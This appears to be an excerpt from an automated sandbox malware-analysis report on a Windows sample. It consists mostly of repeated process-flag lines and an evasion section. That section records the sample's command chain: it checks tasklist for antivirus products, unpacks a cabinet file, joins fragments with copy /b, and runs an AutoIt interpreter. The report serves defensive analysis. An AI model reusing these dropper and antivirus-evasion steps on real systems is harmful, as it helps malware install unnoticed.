      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7610Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1996Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.com TID: 4180Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep count: 7610 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5724Thread sleep count: 1996 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2136Thread sleep time: -6456360425798339s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_00406301 FindFirstFileW,FindClose,1_2_00406301
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406CC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\801291\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\801291Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000001C.00000002.2838688444.0000000007104000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .0 $tVmNetworkAdPSDscXMachine.psm1l
      Source: powershell.exe, 0000001C.00000002.2838688444.0000000007104000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PEventVmNetwoPSDesiredStateConfiguration.types.ps1xml
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Leu Leu.cmd & Leu.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 801291Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ArrayJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Serve" Ltd Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bumper + ..\Specialist + ..\Bind + ..\Intended + ..\Francisco + ..\Recent fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\801291\Historic.com Historic.com fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: Historic.com, 00000011.00000000.2201176256.0000000000623000.00000002.00000001.01000000.00000007.sdmp, Historic.com.3.dr, Evident.14.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
